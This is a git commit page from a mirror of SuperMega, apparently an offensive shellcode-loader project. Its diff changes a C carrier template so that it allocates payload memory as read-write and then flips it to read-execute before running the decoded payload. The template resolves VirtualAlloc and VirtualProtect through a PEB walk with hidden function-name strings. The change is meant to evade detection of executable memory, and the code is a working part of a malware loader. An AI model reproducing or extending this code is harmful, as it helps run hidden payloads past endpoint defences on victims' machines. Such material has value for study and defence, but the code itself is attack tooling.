admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

fix: make memory not rwx, but rw->rx

Browse Source
This commit is contained in:
Dobin
2024-05-02 17:35:11 +01:00
parent c372d348ce
commit ef7f63059e
2 changed files with 24 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/source/carrier/peb_walk/template.c
+18 -1
View File
@@ -84,7 +84,9 @@ int main()
_In_ DWORD flAllocationType,
_In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str);
if (_VirtualAlloc == NULL) return 4;
char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x04); // rw
//sleep_ms(10000);
// Copy
// from: supermega_payload[]
@@ -92,6 +94,21 @@ int main()
// len: 0x11223344
{{ plugin_decoder }}
// ntdll.dll: VirtualAlloc()
char VirtualProtect_str[] = { 'V','i','r','t','u','a','l','P','r','o','t','e', 'c', 't', 0 };
LPVOID (WINAPI * _VirtualProtect)(
_In_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect) = (LPVOID (WINAPI*)(
_In_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect)) _GetProcAddress((HMODULE)base, VirtualProtect_str);
if (_VirtualProtect == NULL) return 4;
_VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result); // rx
// Execute *dest
(*(void(*)())(dest))();